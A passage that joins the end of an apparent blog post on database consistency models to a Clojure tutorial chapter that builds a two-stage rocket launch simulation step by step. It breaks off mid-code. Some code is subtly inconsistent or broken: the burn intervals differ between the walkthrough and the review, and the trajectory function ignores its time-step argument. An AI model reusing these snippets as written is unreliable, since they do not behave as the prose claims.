So in practice, we use hybrid data storage, mixing databases with varying consistency models to achieve our redundancy, availability, performance, and safety objectives. “Weaker” consistency models wherever possible, for availability and performance. “Stronger” consistency models where necessary, because the algorithm being expressed demands a stricter ordering of operations. You can write huge volumes of data to S3, Riak or Cassandra, for instance, then write a pointer to that data, linearizably, to Postgres, Zookeeper or Etcd. Some databases admit multiple consistency models, like tunable isolation levels in relational databases, or Cassandra and Riak’s linearizable transactions, which can help cut down on the number of systems in play. Bottom line, though: anyone who says their consistency model is the only right choice is likely trying to sell something. You can’t have your cake and eat it too.

Armed with a more nuanced understanding of consistency models, I’d like to talk about how we go about verifying the correctness of a linearizable system. In the next Jepsen post, we’ll discuss the linearizability checker I’ve built for testing distributed systems: Knossos.

For a more formal definition of these models, try Dziuma, Fatourou, and Kanellou’s Survey on consistency conditions

Previously: Logistics

Until this point in the book, we’ve dealt primarily in specific details: what an expression is, how math works, which functions apply to different data structures, and where code lives. But programming, like speaking a language, painting landscapes, or designing turbines, is about more than the nuts and bolts of the trade. It’s knowing how to combine those parts into a cohesive whole–and this is a skill which is difficult to describe formally. In this part of the book, I’d like to work with you on an integrative tour of one particular problem: modeling a rocket in flight.

We’re going to reinforce our concrete knowledge of the standard library by using maps, sequences, and math functions together. At the same time, we’re going to practice how to represent a complex system; decomposing a problem into smaller parts, naming functions and variables, and writing tests.

So you want to go to space

First, we need a representation of a craft. The obvious properties for a rocket are its dry mass (how much it weighs without fuel), fuel mass, position, velocity, and time. We’ll create a new file in our scratch project–src/scratch/rocket.clj–to talk about spacecraft.

For starters, let’s pattern our craft after an Atlas V launch vehicle. We’ll represent everything in SI units–kilograms, meters, newtons, etc. The Atlas V carries 627,105 lbs of LOX/RP-1 fuel, and a total mass of 334,500 kg gives only 50,050 kg of mass which isn’t fuel. It develops 4152 kilonewtons of thrust and runs for 253 seconds, with a specific impulse (effectively, exhaust velocity) of 3.05 kilometers/sec. Real rockets develop varying amounts of thrust depending on the atmosphere, but we’ll pretend it’s constant in our simulation.

(defn atlas-v [] {:dry-mass 50050 :fuel-mass 284450 :time 0 :isp 3050 :max-fuel-rate (/ 284450 253) :max-thrust 4.152e6})

How heavy is the craft?

(defn mass "The total mass of a craft." [craft] (+ (:dry-mass craft) (:fuel-mass craft)))

What about the position and velocity? We could represent them in Cartesian coordinates–x, y, and z–or we could choose spherical coordinates: a radius from the planet and angle from the pole and 0 degrees longitude. I’ve got a hunch that spherical coordinates will be easier for position, but accelerating the craft will be simplest in in x, y, and z terms. The center of the planet is a natural choice for the coordinate system’s origin (0, 0, 0). We’ll choose z along the north pole, and x and y in the plane of the equator.

Let’s define a space center where we launch from–let’s say it’s initially on the equator at y=0. To figure out the x coordinate, we’ll need to know how far the space center is from the center of the earth. The earth’s equatorial radius is ~6378 kilometers.

(def earth-equatorial-radius "Radius of the earth, in meters" 6378137)

How fast is the surface moving? Well the earth’s day is 86,400 seconds long,

(def earth-day "Length of an earth day, in seconds." 86400)

which means a given point on the equator has to go 2 * pi * equatorial radius meters in earth-day seconds:

(def earth-equatorial-speed "How fast points on the equator move, relative to the center of the earth, in meters/sec." (/ (* 2 Math/PI earth-equatorial-radius) earth-day))

So our space center is on the equator (z=0), at y=0 by choice, which means x is the equatorial radius. Since the earth is spinning, the space center is moving at earth-equatorial-speed in the y direction–and not changing at all in x or z.

(def initial-space-center "The initial position and velocity of the launch facility" {:time 0 :position {:x earth-equatorial-radius :y 0 :z 0} :velocity {:x 0 :y earth-equatorial-speed :z 0}})

:position and :velocity are both vectors, in the sense that they describe a position, or a direction, in terms of x, y, and z components. This is a different kind of vector than a Clojure vector, like [1 2 3]. We’re actually representing these logical vectors as Clojure maps, with :x, :y, and :z keys, corresponding to the distance along the x, y, and z directions, from the center of the earth. Throughout this chapter, I’ll mainly use the term coordinates to talk about these structures, to avoid confusion with Clojure vectors.

Now let’s create a function which positions our craft on the launchpad at time 0. We’ll just merge the spacecraft’s with the initial space center, overwriting the craft’s time and space coordinates.

(defn prepare "Prepares a craft for launch from an equatorial space center." [craft] (merge craft initial-space-center))

Forces

Gravity continually pulls the spacecraft towards the center of the Earth, accelerating it by 9.8 meters/second every second. To figure out what direction is towards the Earth, we’ll need the angles of a spherical coordinate system. We’ll use the trigonometric functions from java.lang.Math.

(defn magnitude "What's the radius of a given set of cartesian coordinates?" [c] ; By the Pythagorean theorem... (Math/sqrt (+ (Math/pow (:x c) 2) (Math/pow (:y c) 2) (Math/pow (:z c) 2)))) (defn cartesian->spherical "Converts a map of Cartesian coordinates :x, :y, and :z to spherical coordinates :r, :theta, and :phi." [c] (let [r (magnitude c)] {:r r :theta (Math/acos (/ (:z c) r)) :phi (Math/atan (/ (:y c) (:x c)))})) (defn spherical->cartesian "Converts spherical to Cartesian coordinates." [c] {:x (* (:r c) (Math/sin (:theta c)) (Math/cos (:phi c))) :y (* (:r c) (Math/sin (:theta c)) (Math/sin (:phi c))) :z (* (:r c) (Math/cos (:phi c)))})

With those angles in mind, computing the gravitational acceleration is easy. We just take the spherical coordinates of the spacecraft, and replace the radius with the total force due to gravity. Then we can transform that spherical force back into Cartesian coordinates.

(def g "Acceleration of gravity in meters/s^2" -9.8) (defn gravity-force "The force vector, each component in Newtons, due to gravity." [craft] ; Since force is mass times acceleration... (let [total-force (* g (mass craft))] (-> craft ; Now we'll take the craft's position :position ; in spherical coordinates, cartesian->spherical ; replace the radius with the gravitational force... (assoc :r total-force) ; and transform back to Cartesian-land spherical->cartesian)))

Rockets produce thrust by consuming fuel. Let’s say the fuel consumption is always the maximum, until we run out:

(defn fuel-rate "How fast is fuel, in kilograms/second, consumed by the craft?" [craft] (if (pos? (:fuel-mass craft)) (:max-fuel-rate craft) 0))

Now that we know how much fuel is being consumed, we can compute the force the rocket engine develops. That force is simply the mass consumed per second times the exhaust velocity–which is the specific impulse :isp. We’ll ignore atmospheric effects.

(defn thrust "How much force, in newtons, does the craft's rocket engines exert?" [craft] (* (fuel-rate craft) (:isp craft)))

Cool. What about the direction of thrust? Just for grins, let’s keep the rocket pointing entirely along the x axis.

(defn engine-force "The force vector, each component in Newtons, due to the rocket engine." [craft] (let [t (thrust craft)] {:x t :y 0 :z 0}))

The total force on a craft is just the sum of gravity and thrust. To sum these maps together, we’ll need a way to sum the x, y, and z components independently. Clojure’s merge-with function combines common fields in maps using a function, so this is surprisingly straightforward.

(defn total-force "Total force on a craft." [craft] (merge-with + (engine-force craft) (gravity-force craft)))

The acceleration of a craft, by Newton’s second law, is force divided by mass. This one’s a little trickier; given {:x 1 :y 2 :z 4} we want to apply a function–say, multiplication by a factor, to each number. Since maps are sequences of key/value pairs…

user=> (seq {:x 1 :y 2 :z 3}) ([:z 3] [:y 2] [:x 1])

… and we can build up new maps out of key/value pairs using into

user=> (into {} [[:x 4] [:y 5]]) {:x 4, :y 5}

… we can write a function map-values which works like map, but affects the values of a map data structure.

(defn map-values "Applies f to every value in the map m." [f m] (into {} (map (fn [pair] [(key pair) (f (val pair))]) m)))

And that allows us to define a scale function which scales a set of coordinates by some factor:

(defn scale "Multiplies a map of x, y, and z coordinates by the given factor." [factor coordinates] (map-values (partial * factor) coordinates))

What’s that partial thing? It’s a function which takes a function, and some arguments, and returns a new function. What does the new function do? It calls the original function, with the arguments passed to partial, followed by any arguments passed to the new function. In short, (partial * factor) returns a function that takes any number, and multiplies it by factor.

So to divide each component of the force vector by the mass of the craft:

(defn acceleration "Total acceleration of a craft." [craft] (let [m (mass craft)] (scale (/ m) (total-force craft))))

Note that (/ m) returns 1/m. Our scale function can do double-duty as both multiplication and division.

With the acceleration and fuel consumption all figured out, we’re ready to apply those changes over time. We’ll write a function which takes the rocket at a particular time, and returns a version of it dt seconds later.

(defn step [craft dt] (assoc craft ; Time advances by dt seconds :t (+ dt (:t craft)) ; We burn some fuel :fuel-mass (- (:fuel-mass craft) (* dt (fuel-rate craft))) ; Our position changes based on our velocity :position (merge-with + (:position craft) (scale dt (:velocity craft))) ; And our velocity changes based on our acceleration :velocity (merge-with + (:velocity craft) (scale dt (acceleration craft)))))

OK. Let’s save the rocket.clj file, load that code into the REPL, and fire it up.

user=> (use 'scratch.rocket :reload) nil

use is like a shorthand for (:require ... :refer :all). We’re passing :reload because we want the REPL to re-read the file. Notice that in ns declarations, the namespace name scratch.rocket is unquoted–but when we call use or require at the repl, we quote the namespace name.

user=> (atlas-v) {:dry-mass 50050, :fuel-mass 284450, :time 0, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0}

Launch

Let’s prepare the rocket. We’ll use pprint to print it in a more readable form.

user=> (-> (atlas-v) prepare pprint) {:velocity {:x 0, :y 463.8312116386399, :z 0}, :position {:x 6378137, :y 0, :z 0}, :dry-mass 50050, :fuel-mass 284450, :time 0, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0}

Great; there it is on the launchpad. Wow, even “standing still”, it’s moving at 463 meters/sec because of the earth’s rotation! That means you and I are flying through space at almost half a kilometer every second! Let’s step forward one second in time.

user=> (-> (atlas-v) prepare (step 1) pprint) NullPointerException clojure.lang.Numbers.ops (Numbers.java:942)

In evaluating this expression, Clojure reached a point where it could not continue, and aborted execution. We call this error an exception, and the process of aborting throwing the exception. Clojure backs up to the function which called the function that threw, then the function which called that function, and so on, all the way to the top-level expression. The REPL finally intercepts the exception, prints an error to the console, and stashes the exception object in a special variable *e.

In this case, we know that the exception in question was a NullPointerException, which occurs when a function received nil unexpectedly. This one came from clojure.lang.Numbers.ops, which suggests some sort of math was involved. Let’s use pst to find out where it came from.

user=> (pst *e) NullPointerException clojure.lang.Numbers.ops (Numbers.java:942) clojure.lang.Numbers.add (Numbers.java:126) scratch.rocket/step (rocket.clj:125) user/eval1478 (NO_SOURCE_FILE:1) clojure.lang.Compiler.eval (Compiler.java:6619) clojure.lang.Compiler.eval (Compiler.java:6582) clojure.core/eval (core.clj:2852) clojure.main/repl/read-eval-print--6588/fn--6591 (main.clj:259) clojure.main/repl/read-eval-print--6588 (main.clj:259) clojure.main/repl/fn--6597 (main.clj:277) clojure.main/repl (main.clj:277) clojure.tools.nrepl.middleware.interruptible-eval/evaluate/fn--589 (interruptible_eval.clj:56)

This is called a stack trace: the stack is the context of the program at each function call. It traces the path the computer took in evaluating the expression, from the bottom to the top. At the bottom is the REPL, and Clojure compiler. Our code begins at user/eval1478–that’s the compiler’s name for the expression we just typed. That function called scratch.rocket/step, which in turn called Numbers.add, and that called Numbers.ops. Let’s start by looking at the last function we wrote before calling into Clojure’s standard library: the step function, in rocket.clj, on line 125.

123 (assoc craft 124 ; Time advances by dt seconds 125 :t (+ dt (:t craft))

Ah; we named the time field :time earlier, not :t. Let’s replace :t with :time, save the file, and reload.

user=> (use 'scratch.rocket :reload) nil user=> (-> (atlas-v) prepare (step 1) pprint) {:velocity {:x 0.45154055666826215, :y 463.8312116386399, :z -9.8}, :position {:x 6378137, :y 463.8312116386399, :z 0}, :dry-mass 50050, :fuel-mass 71681400/253, :time 1, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0}

Look at that! Our position is unchanged (because our velocity was zero), but our velocity has shifted. We’re now moving… wait, -9.8 meters per second south? That can’t be right. Gravity points down, not sideways. Something must be wrong with our spherical coordinate system. Let’s write a test in test/scratch/rocket_test.clj to explore.

(ns scratch.rocket-test (:require [clojure.test :refer :all] [scratch.rocket :refer :all])) (deftest spherical-coordinate-test (let [pos {:x 1 :y 2 :z 3}] (testing "roundtrip" (is (= pos (-> pos cartesian->spherical spherical->cartesian)))))) aphyr@waterhouse:~/scratch$ lein test lein test scratch.core-test lein test scratch.rocket-test lein test :only scratch.rocket-test/spherical-coordinate-test FAIL in (spherical-coordinate-test) (rocket_test.clj:8) roundtrip expected: (= pos (-> pos cartesian->spherical spherical->cartesian)) actual: (not (= {:z 3, :y 2, :x 1} {:x 1.0, :y 1.9999999999999996, :z 1.6733200530681513})) Ran 2 tests containing 4 assertions. 1 failures, 0 errors. Tests failed.

Definitely wrong. Looks like something to do with the z coordinate, since x and y look OK. Let’s try testing a point on the north pole:

(deftest spherical-coordinate-test (testing "spherical->cartesian" (is (= (spherical->cartesian {:r 2 :phi 0 :theta 0}) {:x 0.0 :y 0.0 :z 2.0}))) (testing "roundtrip" (let [pos {:x 1.0 :y 2.0 :z 3.0}] (is (= pos (-> pos cartesian->spherical spherical->cartesian))))))

That checks out OK. Let’s try some values in the repl.

user=> (cartesian->spherical {:x 0.00001 :y 0.00001 :z 2.0}) {:r 2.00000000005, :theta 7.071068104411588E-6, :phi 0.7853981633974483} user=> (cartesian->spherical {:x 1 :y 2 :z 3}) {:r 3.7416573867739413, :theta 0.6405223126794245, :phi 1.1071487177940904} user=> (spherical->cartesian (cartesian->spherical {:x 1 :y 2 :z 3})) {:x 1.0, :y 1.9999999999999996, :z 1.6733200530681513} user=> (cartesian->spherical {:x 1 :y 2 :z 0}) {:r 2.23606797749979, :theta 1.5707963267948966, :phi 1.1071487177940904} user=> (cartesian->spherical {:x 1 :y 1 :z 0}) {:r 1.4142135623730951, :theta 1.5707963267948966, :phi 0.7853981633974483}

Oh, wait, that looks odd. {:x 1 :y 1 :z 0} is on the equator: phi–the angle from the pole–should be pi/2 or ~1.57, and theta–the angle around the equator–should be pi/4 or 0.78. Those coordinates are reversed! Double-checking our formulas with Wolfram MathWorld shows that we mixed up phi and theta! Let’s redefine cartesian->polar correctly.

(defn cartesian->spherical "Converts a map of Cartesian coordinates :x, :y, and :z to spherical coordinates :r, :theta, and :phi." [c] (let [r (Math/sqrt (+ (Math/pow (:x c) 2) (Math/pow (:y c) 2) (Math/pow (:z c) 2)))] {:r r :phi (Math/acos (/ (:z c) r)) :theta (Math/atan (/ (:y c) (:x c)))})) aphyr@waterhouse:~/scratch$ lein test lein test scratch.core-test lein test scratch.rocket-test Ran 2 tests containing 5 assertions. 0 failures, 0 errors.

Great. Now let’s check the rocket trajectory again.

user=> (-> (atlas-v) prepare (step 1) pprint) {:velocity {:x 0.45154055666826204, :y 463.8312116386399, :z -6.000769315822031E-16}, :position {:x 6378137, :y 463.8312116386399, :z 0}, :dry-mass 50050, :fuel-mass 71681400/253, :time 1, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0}

This time, our velocity is increasing in the +x direction, at half a meter per second. We have liftoff!

Flight

We have a function that can move the rocket forward by one small step of time, but we’d like to understand the rocket’s trajectory as a whole; to see all positions it will take. We’ll use iterate to construct a lazy, infinite sequence of rocket states, each one constructed by stepping forward from the last.

(defn trajectory [dt craft] "Returns all future states of the craft, at dt-second intervals." (iterate #(step % 1) craft)) user=> (->> (atlas-v) prepare (trajectory 1) (take 3) pprint) ({:velocity {:x 0, :y 463.8312116386399, :z 0}, :position {:x 6378137, :y 0, :z 0}, :dry-mass 50050, :fuel-mass 284450, :time 0, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0} {:velocity {:x 0.45154055666826204, :y 463.8312116386399, :z -6.000769315822031E-16}, :position {:x 6378137, :y 463.8312116386399, :z 0}, :dry-mass 50050, :fuel-mass 71681400/253, :time 1, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0} {:velocity {:x 0.9376544222659078, :y 463.83049896253056, :z -1.200153863164406E-15}, :position {:x 6378137.451540557, :y 927.6624232772798, :z -6.000769315822031E-16}, :dry-mass 50050, :fuel-mass 71396950/253, :time 2, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0})

Notice that each map is like a frame of a movie, playing at one frame per second. We can make the simulation more or less accurate by raising or lowering the framerate–adjusting the parameter fed to trajectory. For now, though, we’ll stick with one-second intervals.

How high above the surface is the rocket?

(defn altitude "The height above the surface of the equator, in meters." [craft] (-> craft :position cartesian->spherical :r (- earth-equatorial-radius)))

Now we can explore the rocket’s path as a series of altitudes over time:

user=> (->> (atlas-v) prepare (trajectory 1) (map altitude) (take 10) pprint) (0.0 0.016865378245711327 0.519002066925168 1.540983198210597 3.117615718394518 5.283942770212889 8.075246102176607 11.52704851794988 15.675116359256208 20.555462017655373)

The million dollar question, though, is whether the rocket breaks orbit.

(defn above-ground? "Is the craft at or above the surface?" [craft] (<= 0 (altitude craft))) (defn flight "The above-ground portion of a trajectory." [trajectory] (take-while above-ground? trajectory)) (defn crashed? "Does this trajectory crash into the surface before 100 hours are up?" [trajectory] (let [time-limit (* 100 3600)] ; 1 hour (not (every? above-ground? (take-while #(<= (:time %) time-limit) trajectory))))) (defn crash-time "Given a trajectory, returns the time the rocket impacted the ground." [trajectory] (:time (last (flight trajectory)))) (defn apoapsis "The highest altitude achieved during a trajectory." [trajectory] (apply max (map altitude trajectory))) (defn apoapsis-time "The time of apoapsis" [trajectory] (:time (apply max-key altitude (flight trajectory))))

If the rocket goes below ground, we know it crashed. If the rocket stays in orbit, the trajectory will never end. That makes it a bit tricky to tell whether the rocket is in a stable orbit or not, because we can’t ask about every element, or the last element, of an infinite sequence: it’ll take infinite time to evaluate. Instead, we’ll assume that the rocket should crash within the first, say, 100 hours; if it makes it past that point, we’ll assume it made orbit successfully. With these functions in hand, we’ll write a test in test/scratch/rocket_test.clj to see whether or not the launch is successful:

(deftest makes-orbit (let [trajectory (->> (atlas-v) prepare (trajectory 1))] (when (crashed? trajectory) (println "Crashed at" (crash-time trajectory) "seconds") (println "Maximum altitude" (apoapsis trajectory) "meters at" (apoapsis-time trajectory) "seconds")) ; Assert that the rocket eventually made it to orbit. (is (not (crashed? trajectory))))) aphyr@waterhouse:~/scratch$ lein test scratch.rocket-test lein test scratch.rocket-test Crashed at 982 seconds Maximum altitude 753838.039645385 meters at 532 seconds lein test :only scratch.rocket-test/makes-orbit FAIL in (makes-orbit) (rocket_test.clj:26) expected: (not (crashed? trajectory)) actual: (not (not true)) Ran 2 tests containing 3 assertions. 1 failures, 0 errors. Tests failed.

We made it to an altitude of 750 kilometers, and crashed 982 seconds after launch. We’re gonna need a bigger boat.

Stage II

The Atlas V isn’t big enough to make it into orbit on its own. It carries a second stage, the Centaur), which is much smaller and uses more efficient engines.

(defn centaur "The upper rocket stage. http://en.wikipedia.org/wiki/Centaur_(rocket_stage) http://www.astronautix.com/stages/cenaurde.htm" [] {:dry-mass 2361 :fuel-mass 13897 :isp 4354 :max-fuel-rate (/ 13897 470)})

The Centaur lives inside the Atlas V main stage. We’ll re-write atlas-v to take an argument: its next stage.

(defn atlas-v "The full launch vehicle. http://en.wikipedia.org/wiki/Atlas_V" [next-stage] {:dry-mass 50050 :fuel-mass 284450 :isp 3050 :max-fuel-rate (/ 284450 253) :next-stage next-stage})

Now, in our tests, we’ll construct the rocket like so:

(let [trajectory (->> (atlas-v (centaur)) prepare (trajectory 1))]

When we exhaust the fuel reserves of the primary stage, we’ll de-couple the main booster from the Centaur. In terms of our simulation, the Atlas V will be replaced by its next stage, the Centaur. We’ll write a function stage which separates the vehicles when ready:

(defn stage "When fuel reserves are exhausted, separate stages. Otherwise, return craft unchanged." [craft] (cond ; Still fuel left (pos? (:fuel-mass craft)) craft ; No remaining stages (nil? (:next-stage craft)) craft ; Stage! :else (merge (:next-stage craft) (select-keys craft [:time :position :velocity]))))

We’re using cond to handle three distinct cases: where there’s fuel remaining in the craft, where there is no stage to separate, and when we’re ready for stage separation. Separation is easy: we simply return the next stage of the current craft, with the current craft’s time, position, and velocity merged in.

Finally, we’ll have to update our step function to take into account the possibility of stage separation.

(defn step [craft dt] (let [craft (stage craft)] (assoc craft ; Time advances by dt seconds :time (+ dt (:time craft)) ; We burn some fuel :fuel-mass (- (:fuel-mass craft) (* dt (fuel-rate craft))) ; Our position changes based on our velocity :position (merge-with + (:position craft) (scale dt (:velocity craft))) ; And our velocity changes based on our acceleration :velocity (merge-with + (:velocity craft) (scale dt (acceleration craft))))))

Same as before, only now we call stage prior to the physics simulation. Let’s try a launch.

aphyr@waterhouse:~/scratch$ lein test scratch.rocket-test lein test scratch.rocket-test Crashed at 2415 seconds Maximum altitude 4598444.289945109 meters at 1446 seconds lein test :only scratch.rocket-test/makes-orbit FAIL in (makes-orbit) (rocket_test.clj:27) expected: (not (crashed? trajectory)) actual: (not (not true)) Ran 2 tests containing 3 assertions. 1 failures, 0 errors. Tests failed.

Still crashed–but we increased our apoapsis from 750 kilometers to 4,598 kilometers. That’s plenty high, but we’re still not making orbit. Why? Because we’re going straight up, then straight back down. To orbit, we need to move sideways, around the earth.

Orbital insertion

Our spacecraft is shooting upwards, but in order to remain in orbit around the earth, it has to execute a second burn: an orbital injection maneuver. That injection maneuver is also called a circularization burn because it turns the orbit from an ascending parabola into a circle (or something roughly like it). We don’t need to be precise about circularization–any trajectory that doesn’t hit the planet will suffice. All we have to do is burn towards the horizon, once we get high enough.

To do that, we’ll need to enhance the rocket’s control software. We assumed that the rocket would always thrust in the +x direction; but now we’ll need to thrust in multiple directions. We’ll break up the engine force into two parts: thrust (how hard the rocket motor pushes) and orientation (which determines the direction the rocket is pointing.)

(defn unit-vector "Scales coordinates to magnitude 1." [coordinates] (scale (/ (magnitude coordinates)) coordinates)) (defn engine-force "The force vector, each component in Newtons, due to the rocket engine." [craft] (scale (thrust craft) (unit-vector (orientation craft))))

We’re taking the orientation of the craft–some coordinates–and scaling it to be of length one with unit-vector. Then we’re scaling the orientation vector by the thrust, returning a thrust vector.

As we go back and redefine parts of the program, you might see an error like

Exception in thread "main" java.lang.RuntimeException: Unable to resolve symbol: unit-vector in this context, compiling:(scratch/rocket.clj:69:11) at clojure.lang.Compiler.analyze(Compiler.java:6380) at clojure.lang.Compiler.analyze(Compiler.java:6322)

This is a stack trace from the Clojure compiler. It indicates that in scratch/rocket.clj, on line 69, column 11, we used the symbol unit-vector–but it didn’t have a meaning at that point in the program. Perhaps unit-vector is defined below that line. There are two ways to solve this.

  1. Organize your functions so that the simple ones come first, and those that depend on them come later. Read this way, namespaces tell a story, progressing from smaller to bigger, more complex problems.

  2. Sometimes, ordering functions this way is impossible, or would put related ideas too far apart. In this case you can (declare unit-vector) near the top of the namespace. This tells Clojure that unit-vector isn’t defined yet, but it’ll come later.

Now that we’ve broken up engine-force into thrust and orientation, we have to control the thrust properly for our two burns. We’ll start by defining the times for the initial ascent and circularization burn, expressed as vectors of start and end times, in seconds.

(def ascent "The start and end times for the ascent burn." [0 3000]) (def circularization "The start and end times for the circularization burn." [4000 1000])

Now we’ll change the thrust by adjusting the rate of fuel consumption. Instead of burning at maximum until running out of fuel, we’ll execute two distinct burns.

(defn fuel-rate "How fast is fuel, in kilograms/second, consumed by the craft?" [craft] (cond ; Out of fuel (<= (:fuel-mass craft) 0) 0 ; Ascent burn (<= (first ascent) (:time craft) (last ascent)) (:max-fuel-rate craft) ; Circularization burn (<= (first circularization) (:time craft) (last circularization)) (:max-fuel-rate craft) ; Shut down engines otherwise :else 0))

We’re using cond to express four distinct possibilities: that we’ve run out of fuel, executing either of the two burns, or resting with the engines shut down. Because the comparison function <= takes any number of arguments and asserts that they occur in order, expressing intervals like “the time is between the first and last times in the ascent” is easy.

Finally, we need to determine the direction to burn in. This one’s gonna require some tricky linear algebra. You don’t need to worry about the specifics here–the goal is to find out what direction the rocket should burn to fly towards the horizon, in a circle around the planet. We’re doing that by taking the rocket’s velocity vector, and flattening out the velocity towards or away from the planet. All that’s left is the direction the rocket is flying around the earth.

(defn dot-product "Finds the inner product of two x, y, z coordinate maps. See http://en.wikipedia.org/wiki/Dot_product." [c1 c2] (+ (* (:x c1) (:x c2)) (* (:y c1) (:y c2)) (* (:z c1) (:z c2)))) (defn projection "The component of coordinate map a in the direction of coordinate map b. See http://en.wikipedia.org/wiki/Vector_projection." [a b] (let [b (unit-vector b)] (scale (dot-product a b) b))) (defn rejection "The component of coordinate map a *not* in the direction of coordinate map b." [a b] (let [a' (projection a b)] {:x (- (:x a) (:x a')) :y (- (:y a) (:y a')) :z (- (:z a) (:z a'))}))

With the mathematical underpinnings ready, we’ll define the orientation control software:

(defn orientation "What direction is the craft pointing?" [craft] (cond ; Initially, point along the *position* vector of the craft--that is ; to say, straight up, away from the earth. (<= (first ascent) (:time craft) (last ascent)) (:position craft) ; During the circularization burn, we want to burn *sideways*, in the ; direction of the orbit. We'll find the component of our velocity ; which is aligned with our position vector (that is to say, the vertical ; velocity), and subtract the vertical component. All that's left is the ; *horizontal* part of our velocity. (<= (first circularization) (:time craft) (last circularization)) (rejection (:velocity craft) (:position craft)) ; Otherwise, just point straight ahead. :else (:velocity craft)))

For the ascent burn, we’ll push straight away from the planet. For circularization, we use the rejection function to find the part of the velocity around the planet, and thrust in that direction. By default, we’ll leave the rocket pointing in the direction of travel.

With these changes made, the rocket should execute two burns. Let’s re-run the tests and see.

aphyr@waterhouse:~/scratch$ lein test scratch.rocket-test lein test scratch.rocket-test Ran 2 tests containing 3 assertions. 0 failures, 0 errors.

We finally did it! We’re rocket scientists!

Review

(ns scratch.rocket) ;; Linear algebra for {:x 1 :y 2 :z 3} coordinate vectors. (defn map-values "Applies f to every value in the map m." [f m] (into {} (map (fn [pair] [(key pair) (f (val pair))]) m))) (defn magnitude "What's the radius of a given set of cartesian coordinates?" [c] ; By the Pythagorean theorem... (Math/sqrt (+ (Math/pow (:x c) 2) (Math/pow (:y c) 2) (Math/pow (:z c) 2)))) (defn scale "Multiplies a map of x, y, and z coordinates by the given factor." [factor coordinates] (map-values (partial * factor) coordinates)) (defn unit-vector "Scales coordinates to magnitude 1." [coordinates] (scale (/ (magnitude coordinates)) coordinates)) (defn dot-product "Finds the inner product of two x, y, z coordinate maps. See http://en.wikipedia.org/wiki/Dot_product" [c1 c2] (+ (* (:x c1) (:x c2)) (* (:y c1) (:y c2)) (* (:z c1) (:z c2)))) (defn projection "The component of coordinate map a in the direction of coordinate map b. See http://en.wikipedia.org/wiki/Vector_projection." [a b] (let [b (unit-vector b)] (scale (dot-product a b) b))) (defn rejection "The component of coordinate map a *not* in the direction of coordinate map b." [a b] (let [a' (projection a b)] {:x (- (:x a) (:x a')) :y (- (:y a) (:y a')) :z (- (:z a) (:z a'))})) ;; Coordinate conversion (defn cartesian->spherical "Converts a map of Cartesian coordinates :x, :y, and :z to spherical coordinates :r, :theta, and :phi." [c] (let [r (magnitude c)] {:r r :phi (Math/acos (/ (:z c) r)) :theta (Math/atan (/ (:y c) (:x c)))})) (defn spherical->cartesian "Converts spherical to Cartesian coordinates." [c] {:x (* (:r c) (Math/cos (:theta c)) (Math/sin (:phi c))) :y (* (:r c) (Math/sin (:theta c)) (Math/sin (:phi c))) :z (* (:r c) (Math/cos (:phi c)))}) ;; The earth (def earth-equatorial-radius "Radius of the earth, in meters" 6378137) (def earth-day "Length of an earth day, in seconds." 86400) (def earth-equatorial-speed "How fast points on the equator move, relative to the center of the earth, in meters/sec." (/ (* 2 Math/PI earth-equatorial-radius) earth-day)) (def g "Acceleration of gravity in meters/s^2" -9.8) (def initial-space-center "The initial position and velocity of the launch facility" {:time 0 :position {:x earth-equatorial-radius :y 0 :z 0} :velocity {:x 0 :y earth-equatorial-speed :z 0}}) ;; Craft (defn centaur "The upper rocket stage. http://en.wikipedia.org/wiki/Centaur_(rocket_stage) http://www.astronautix.com/stages/cenaurde.htm" [] {:dry-mass 2361 :fuel-mass 13897 :isp 4354 :max-fuel-rate (/ 13897 470)}) (defn atlas-v "The full launch vehicle. http://en.wikipedia.org/wiki/Atlas_V" [next-stage] {:dry-mass 50050 :fuel-mass 284450 :isp 3050 :max-fuel-rate (/ 284450 253) :next-stage next-stage}) ;; Flight control (def ascent "The start and end times for the ascent burn." [0 300]) (def circularization "The start and end times for the circularization burn." [400 1000]) (defn orientation "What direction is the craft pointing?" [craft] (cond ; Initially, point along the *position* vector of the craft--that is ; to say, straight up, away from the earth. (<= (first ascent) (:time craft) (last ascent)) (:position craft) ; During the circularization burn, we want to burn *sideways*, in the ; direction of the orbit. We'll find the component of our velocity ; which is aligned with our position vector (that is to say, the vertical ; velocity), and subtract the vertical component. All that's left is the ; *horizontal* part of our velocity. (<= (first circularization) (:time craft) (last circularization)) (rejection (:velocity craft) (:position craft)) ; Otherwise, just point straight ahead. :else (:velocity craft))) (defn fuel-rate "How fast is fuel, in kilograms/second, consumed by the craft?" [craft] (cond ; Out of fuel (<= (:fuel-mass craft) 0) 0 ; Ascent burn (<= (first ascent) (:time craft) (last ascent)) (:max-fuel-rate craft) ; Circularization burn (<= (first circularization) (:time craft) (last circularization)) (:max-fuel-rate craft) ; Shut down engines otherwise :else 0)) (defn stage "When fuel reserves are exhausted, separate stages. Otherwise, return craft unchanged." [craft] (cond ; Still fuel left (pos? (:fuel-mass craft)) craft ; No remaining stages (nil? (:next-stage craft)) craft ; Stage! :else (merge (:next-stage craft) (select-keys craft [:time :position :velocity])))) ;; Dynamics (defn thrust "How much force, in newtons, does the craft's rocket engines exert?" [craft] (* (fuel-rate craft) (:isp craft))) (defn mass "The total mass of a craft." [craft] (+ (:dry-mass craft) (:fuel-mass craft))) (defn gravity-force "The force vector, each component in Newtons, due to gravity." [craft] ; Since force is mass times acceleration... (let [total-force (* g (mass craft))] (-> craft ; Now we'll take the craft's position :position ; in spherical coordinates, cartesian->spherical ; replace the radius with the gravitational force... (assoc :r total-force) ; and transform back to Cartesian-land spherical->cartesian))) (declare altitude) (defn engine-force "The force vector, each component in Newtons, due to the rocket engine." [craft] ; Debugging; useful for working through trajectories in detail. ; (println craft) ; (println "t " (:time craft) "alt" (altitude craft) "thrust" (thrust craft)) ; (println "fuel" (:fuel-mass craft)) ; (println "vel " (:velocity craft)) ; (println "ori " (unit-vector (orientation craft))) (scale (thrust craft) (unit-vector (orientation craft)))) (defn total-force "Total force on a craft." [craft] (merge-with + (engine-force craft) (gravity-force craft))) (defn acceleration "Total acceleration of a craft." [craft] (let [m (mass craft)] (scale (/ m) (total-force craft)))) (defn step [craft dt] (let [craft 